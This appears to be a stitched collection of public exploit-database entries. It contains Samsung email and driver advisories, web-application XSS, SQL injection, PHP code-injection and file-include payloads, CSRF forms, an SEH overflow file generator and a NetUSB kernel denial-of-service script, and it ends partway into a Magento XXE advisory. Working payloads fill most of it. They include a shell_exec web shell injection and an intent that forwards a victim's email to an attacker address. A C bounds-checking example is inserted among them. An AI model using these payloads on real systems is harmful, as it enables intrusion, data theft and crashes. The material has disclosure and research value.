
# Source: https://code.google.com/p/google-security-research/issues/detail?id=494

'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views an HTML email which contains HTML script tags or other event handlers.

At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. 

This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.

Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"

msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you

text = "Hello There!"
html = """\
<html>
  <head></head>
  <body>
   <p>
       <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
    </p>
  </body>
</html>
"""

part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

msg.attach(part1)
msg.attach(part2)

s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=492

The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.

The key observation is in the locking routine definitions in fimg2d.h:

#ifdef BLIT_WORKQUE
#define g2d_lock(x)             do {} while (0)
#define g2d_unlock(x)           do {} while (0)
#define g2d_spin_lock(x, f)     spin_lock_irqsave(x, f)
#define g2d_spin_unlock(x, f)   spin_unlock_irqrestore(x, f)
#else
#define g2d_lock(x)             mutex_lock(x)
#define g2d_unlock(x)           mutex_unlock(x)
#define g2d_spin_lock(x, f)     do { f = 0; } while (0)
#define g2d_spin_unlock(x, f)   do { f = 0; } while (0)
#endif

This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"):

ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */

switch (cmd) {
case FIMG2D_BITBLT_BLIT:

	mm = get_task_mm(current);
	if (!mm) {
		fimg2d_err("no mm for ctx\n");
		return -ENXIO;
	}

	g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */

	ctx->mm = mm;

	ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg);
	if (ret) {
		...
	}

	ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */
	if (ret) {
		...
	}

	g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */

As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor).

Reproduction steps:
Open /dev/fimg2d
Fork to get two processes with different mm's that both have access to the fd
Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes.
One ioctl should have valid data, the other should fail

At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=491

The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflows a static global buffer:

static ssize_t esa_write(struct file *file, const char *buffer,
                                        size_t size, loff_t *pos)
{
        struct esa_rtd *rtd = file->private_data;
        unsigned char *ibuf;
…
        ibuf = rtd->ibuf0;
...
        /* receive stream data from user */
        if (copy_from_user(ibuf, buffer, size)) {
                esa_err("%s: failed to copy_from_user\n", __func__);
                goto err;
        }

Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge):

# dd if=/dev/zero of=/dev/seiren count=5000000
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=490

The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent, this will show up in a "sent email" notification and will be present in the user's sent email folder.
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=493

The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server.

The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:

static long m2m1shot_compat_ioctl32(struct file *filp,
                                unsigned int cmd, unsigned long arg)
{
...
        switch (cmd) {
        case COMPAT_M2M1SHOT_IOC_PROCESS:
        {
                struct compat_m2m1shot data;
                struct m2m1shot_task task;
                int i, ret;

                memset(&task, 0, sizeof(task));

                if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
                        dev_err(m21dev->dev,
                                "%s: Failed to read userdata\n", __func__);
                        return -EFAULT;
                }

                ...
                for (i = 0; i < data.buf_out.num_planes; i++) {
                        task.task.buf_out.plane[i].len =
                                                data.buf_out.plane[i].len;
                        ...
                }

In this code snippet, the data.buf_out.num_planes value is an attacker-controlled "u8" value and is not bounds checked. However, the task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above.

Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip
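The esa_write bug above (a user-supplied size copied into a fixed buffer) and the m2m1shot compat ioctl bug (a loop bounded by an unchecked u8 num_planes) share one root cause: a user-controlled count or length is never compared with the fixed-size destination before the copy. The user-space C program below is an added example, not code from the advisories or from the Samsung drivers; the struct layouts, IBUF_SIZE and the names planes_copy_checked, stream_write_checked, demo_planes and demo_write are assumptions, and memcpy stands in for copy_from_user. It shows the check that has to precede each copy.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-ins for the driver structures; the layouts are assumed,
 * not copied from the kernel. MAX_PLANES mirrors the three-element
 * task.task.buf_out.plane array; IBUF_SIZE is an assumed size for the fixed
 * esa ibuf0 buffer. */
#define MAX_PLANES 3
#define IBUF_SIZE  4096

struct compat_plane { uint32_t len; };
struct compat_buf   { uint8_t num_planes; struct compat_plane plane[MAX_PLANES]; };
struct task_plane   { size_t len; };
struct task_buf     { unsigned num_planes; struct task_plane plane[MAX_PLANES]; };

/* Hardened form of the m2m1shot plane-copy loop. The u8 num_planes is
 * validated against the destination array before the loop runs, so neither
 * the read of src->plane[i] nor the write of dst->plane[i] can leave the
 * array. Returns 0 on success, -EINVAL if the count is out of range. */
int planes_copy_checked(struct task_buf *dst, const struct compat_buf *src)
{
    if (src->num_planes > MAX_PLANES)
        return -EINVAL;
    memset(dst, 0, sizeof(*dst));
    dst->num_planes = src->num_planes;
    for (unsigned i = 0; i < src->num_planes; i++)
        dst->plane[i].len = src->plane[i].len;
    return 0;
}

/* Hardened form of the esa_write copy. The user-supplied size is compared
 * with the fixed destination before anything is copied (memcpy stands in
 * for copy_from_user). Returns the byte count accepted, or -EINVAL if the
 * request does not fit. */
long stream_write_checked(unsigned char *ibuf, size_t ibuf_size,
                          const unsigned char *user, size_t size)
{
    if (size > ibuf_size)
        return -EINVAL;
    memcpy(ibuf, user, size);
    return (long)size;
}

/* Constructed inputs standing in for what an ioctl/write caller supplies. */
int demo_planes(uint8_t num_planes)
{
    struct compat_buf src;
    struct task_buf dst;
    memset(&src, 0, sizeof(src));
    src.num_planes = num_planes;
    for (int i = 0; i < MAX_PLANES; i++)
        src.plane[i].len = 100u * (uint32_t)(i + 1);
    return planes_copy_checked(&dst, &src);
}

long demo_write(size_t size)
{
    static unsigned char ibuf[IBUF_SIZE];
    static unsigned char user[IBUF_SIZE + 1]; /* constructed user buffer */
    return stream_write_checked(ibuf, sizeof(ibuf), user, size);
}

int main(void)
{
    printf("num_planes=200 -> %d (expect %d)\n", demo_planes(200), -EINVAL);
    printf("num_planes=3   -> %d (expect 0)\n", demo_planes(3));
    printf("write %d bytes -> %ld (expect %d)\n", IBUF_SIZE + 1,
           demo_write(IBUF_SIZE + 1), -EINVAL);
    printf("write 16 bytes -> %ld (expect 16)\n", demo_write(16));
    return 0;
}
```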
            
source: https://www.securityfocus.com/bid/60426/info

Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
            
source: https://www.securityfocus.com/bid/60447/info

HP Insight Diagnostics is prone to a remote code-injection vulnerability.

An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.

HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected.

https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes 
            
source: https://www.securityfocus.com/bid/60449/info

HP Insight Diagnostics is prone to a local file include vulnerability because it fails to adequately validate user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. 

https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html 
            
source: https://www.securityfocus.com/bid/60426/info
 
Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 
Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
            
# Description of the component:
Reach, engage and delight more customers with newsletters, auto-responders
or campaign management.

##################################################################################################
# Exploit Title: [Joomla component com_jnews - SQL injection]
# Google Dork: [inurl:option=com_jnews]
# Date: [2015-10-29]
# Exploit Author: [Omer Ramić]
# Twitter: https://twitter.com/sp_omer
# Vendor Homepage: [http://www.joobi.co/]
# Software Link: [
http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031
]
# Version: [8.5.1] & probably all prior
# Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################

#Vulnerable POST parameter:
Parameter_1: sub_list_id[1] (This parameter needs to be encoded when
exploited as: sub_list_id%5B1%5D)


#The vulnerable parameter is within the following request:

POST /joomlatest/index.php?option=com_jnews HTTP/1.1
Host: 192.168.0.10
User-Agent: Hidden-user-agent-version
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 318

Itemid=188&name=asdf&email=asdf%40asdf.com
&receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1





#Vector:
sub_list_id%5B1%5D=1[SQLi]



POC_1: boolean-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28
END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1

POC_2: error-based
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT
(ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1

POC_3: AND/OR time-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT
* FROM
(SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1



###################################
# Greets to Palestine from Bosnia          #
###################################

Good Luck ^__^
            
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title		: Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC
# Discovery by		: Luis Martínez
# Email			: l4m5@hotmail.com
# Discovery Date	: 20/10/2015
# Vendor Homepage	: http://samspade.org
# Software Link		: http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version	: 1.14
# Vulnerability Type	: Denial of Service (DoS) Local
# Tested on OS		: Windows XP Professional SP3 x86 es
# Crash Point		: Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 0012EBE0 43434343
# 42424242 *** CORRUPT ENTRY ***
 
# And the Stack
 
#0012EBD0   41414141  AAAA
#0012EBD4   41414141  AAAA
#0012EBD8   41414141  AAAA
#0012EBDC   41414141  AAAA
#0012EBE0   42424242  BBBB  Pointer to next SEH record
#0012EBE4   43434343  CCCC  SE handler
 
# And the Registers
 
#EAX 00000001
#ECX 00000001
#EDX 00140608
#EBX 00000000
#ESP 0012EBD0 ASCII "AAAAAAAAAAAAAAAABBBBCCCC - "
#EBP 41414141
#ESI 00C2BD00
#EDI 00E89DB0
#EIP 41414141

buffer = "\x41" * 531
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("samspade_1.14_BoF.txt", "w")
f.write(buffer+nseh+seh)
f.close()
            
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: NetUSB Kernel Stack Buffer Overflow
# Date: 9/10/15
# Exploit Author: Adrian Ruiz Bermudo
# Vendor Homepage: http://www.kcodes.com/
# Version: Multiple: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
# Tested on: NETGEAR DC112A
# CVE : CVE-2015-3036

import socket
import sys
import random
import string
import time
import struct
from Crypto.Cipher import AES #pip install pycrypto

DOS_BYTES = 128	#BoF
TIMEOUT = 5
RECV_SIZE = 16
PORT_DEFAULT = 20005

AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc"

print "#"
print "# Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)"
print "# CVE-2015-3036"
print "# Found by: Stefan Viehböck (Office Vienna) | SEC Consult Vulnerability Lab | https://www.sec-consult.com"
print "# Exploit author: Adrián Ruiz Bermudo | @funsecurity | http://www.funsecurity.net"
print "# Advisory: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt"
print "#"
print ""

if len(sys.argv) >= 2:
	try:
		target = sys.argv[1]
		try:
			port = int(sys.argv[2])
		except Exception as detail:
			port = PORT_DEFAULT
		
		# Connection initialisation.
		init = "\x56\x05"
		# Random data for the handshake.
		randomData = "".join(random.choice(string.lowercase) for i in range(RECV_SIZE))
		# Computer name of 128 characters to trigger the DoS.
		computerName = "".join(random.choice(string.lowercase) for i in range(DOS_BYTES))
		# Length of the computer name - "\x80\x00\x00\x00"
		lengthComputerName = struct.pack("i", DOS_BYTES);
		#Sync - "\x07\x00\x00\x00"
		syncOK = struct.pack("i", 7);
		# End of the connection.
		end = "\x01"

		encryption_suite = AES.new(AESKey, AES.MODE_ECB, "")
		randomDataCrypt1 = encryption_suite.encrypt(randomData)

		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.settimeout(TIMEOUT)

		print "Conectando:", target,":",port
		sock.connect((target, port))
		print "Conectado"
		print "----------------"

		print "Inicializando:", init.encode("hex")
		sock.send(init)
		print "Random data para cifrar por el servidor:", randomData.encode("hex")
		sock.send(randomData)
		print "----------------"

		result = sock.recv(RECV_SIZE)
		print "Random data cifrados por el servidor:", result.encode("hex")
		print "Random data cifrados por el cliente:", randomDataCrypt1.encode("hex")
		if (randomDataCrypt1 == result):
			print "Handshake OK"
			randomData = sock.recv(RECV_SIZE)
			print "Random data a cifrar por el cliente:", randomData.encode("hex")
			randomDataCrypt2 = encryption_suite.encrypt(randomData)
			print "Random data cifrados por el cliente:", randomDataCrypt2.encode("hex")
			print "----------------"
			sock.send(randomDataCrypt2)
			print "Tamanio del nombre del host a parear:", lengthComputerName.encode("hex")
			sock.send(lengthComputerName)
			print "Nombre del host a parear:", computerName.encode("hex")
			sock.send(computerName)
			print "----------------"

			print "Sync: ", syncOK.encode("hex")
			sock.send(syncOK)
			if (sock.recv(RECV_SIZE) == syncOK):
				print "Sync ok"
				sock.send(end)
				try:
					# Wait a few seconds before reconnecting.
					time.sleep(TIMEOUT)
					# Check whether the device is still alive...
					sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
					sock.settimeout(TIMEOUT)
					sock.connect((target, port))
					print "No vulnerable"
				except Exception as detail:
					print "Vulnerable, exploit OK"
			else:
				print 'Sync error.'
	except Exception as detail:
		print "Error de comunicación:", detail
else:
	print "Usage:", sys.argv[0], "target [port]"
            
source: https://www.securityfocus.com/bid/60455/info

Max Forum is prone to multiple input-validation vulnerabilities including a PHP code-execution vulnerability, a local file-include vulnerability and an information-disclosure because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to inject arbitrary PHP code and include and execute arbitrary files from the vulnerable system in the context of the affected application and to obtain sensitive information that may aid in further attacks.

Max Forum 2.0.0 is vulnerable; other versions may also be affected. 

PHP code-execution:

POST /Max/install/install.php?step=4 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example/Max/install/install.php?step=3
Cookie: exp_lang=en; language=english; max_name=admin; max_password=2d6df19ab196f1c344310e0021239a06; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 179

mysql_host=www.example&mysql_login=root&mysql_pass=toor&mysql_database=max&db_prefix=max_%22%3Bphpinfo%28%29%3B%2F%2F&site_address=http%3A%2F%2Fwww.example%2FMax%2F&step=4&prev_step=3

Local file-include:

GET /Max/install/ HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: language=../../phpinfo; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive

Information-disclosure:

GET /Max/index.php?forum=2 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang=
Connection: keep-alive
            
source: https://www.securityfocus.com/bid/60458/info

The Ambience theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg 
            
source: https://www.securityfocus.com/bid/60461/info

ScriptCase is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/scelta_categoria.php?categoria=[SQLi] 
            
source: https://www.securityfocus.com/bid/60488/info

mkCMS is prone to an arbitrary PHP code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application.

mkCMS 3.6 is vulnerable; other versions may also be affected. 

http://www.example.com/mkCMS/index.php?cmd=dir 
            
source: https://www.securityfocus.com/bid/60459/info

Lokboard is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Lokboard 1.1 is vulnerable; other versions may also be affected. 

POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();// 
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Cross site request forgery (CSRF)


Vulnerability Details:
=====================

Multiple CSRF issues in PHP Server Monitor allow remote attackers to add
arbitrary users & servers to the system, modify system configurations
and delete arbitrary servers, if a user (admin) is logged in and visits our
malicious website or clicks on our infected links. As no CSRF protection is
used in the application, we can make requests on the victim's behalf and the
server will happily oblige, processing our malicious HTTP requests.


Exploit code(s):
===============

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>


1) add arbitrary users to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0"
method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="20">
<input type="text" name="password" value="abc123">
<input type="text" name="password_repeat" value="abc123">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>



2) add arbitrary servers to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to="
method="post">
<input type="text" name="label" value="HELL" >
<input type="text" name="ip" value="malicious-domain.hell">
<input type="text" name="type" value="service">
<input type="text" name="port" value="666">
<input type="text" name="pattern" value="">
<input type="text" name="warning_threshold" value="1">
<input type="text" name="timeout" value="">
<input type="text" name="active" value="yes">
<input type="text" name="email" value="yes">
<input type="text" name="sms" value="yes">
<input type="text" name="pushover" value="yes">
</form>


3) modify system configuration:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save"
method="post">
<input type="text" name="language" value="en_US" >
<input type="text" name="show_update%5B%5D=" value="on">
<input type="text" name="auto_refresh_servers" value="0">
<input type="text" name="alert_type" value="status">
<input type="text" name="log_status%5B%5D" value="on">
<input type="text" name="log_retention_period" value="1">
<input type="text" name="email_status%5B%5D" value="on">
<input type="text" name="log_email%5B%5D" value="on">
<input type="text" name="email_from_name" value="ghostofsin">
<input type="text" name="email_from_email" value="abysmalgodz@abyss.com">
<input type="text" name="email_smtp_port" value="25">
<input type="text" name="email_smtp_security" value="">
<input type="text" name="email_smtp_username" value="">
<input type="text" name="email_smtp_password" value="">
<input type="text" name="test_email" value="1">
<input type="text" name="log_sms%5B%5D" value="on">
<input type="text" name="sms_gateway" value="whatever">
<input type="text" name="sms_gateway_username" value="username">
<input type="text" name="sms_gateway_password" value="password">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="test_sms" value="0">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="log_pushover%5B%5D" value="0">
<input type="text" name="pushover_api_token" value="">
<input type="text" name="test_pushover" value="0">
</form>

</body>
</html>


4) arbitrary server deletion via GET request:

http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2


Exploitation Technique:
=======================
Remote


Severity Level:
=========================================================
High


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Description:
==========================================================


Request Method(s):              [+]  GET / POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
=============================================
- Release date: 29.10.2015
- Discovered by: Dawid Golunski
- Severity: High/Critical
- eBay Magento ref.: APPSEC-1045
=============================================

 
I. VULNERABILITY
-------------------------

eBay Magento CE <= 1.9.2.1       XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1      

 
II. BACKGROUND
-------------------------

- eBay Magento eCommerce

http://magento.com/

"More than 240,000 merchants worldwide put their trust in our eCommerce 
software. Magento's eCommerce platform gives you the tools you need to attract 
more prospects, sell more products, and make more money. It's what we do.

We're owned by eBay, so you know we're eCommerce experts"


- PHP FPM

http://php.net/manual/en/install.fpm.php

"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
 some additional features (mostly) useful for heavy-loaded sites."

Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI 
process manager into its codebase. 

 
III. INTRODUCTION
-------------------------

eBay Magento eCommerce application uses Zend Framework which has a 
vulnerability that allows for XML eXternal Entity injection in applications
served with PHP FPM.

An XXE (XML eXternal Entity) attack targets an application that parses XML 
input from untrusted sources with an incorrectly configured XML parser. 
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues in PHP applications may also lead to denial of service or,
in some cases (e.g. when the 'expect' PHP module is installed), to command 
execution.


IV. DESCRIPTION
-------------------------
 
The aforementioned XXE vulnerability in Zend Framework which affects eBay 
Magento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a 
separate advisory at:

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

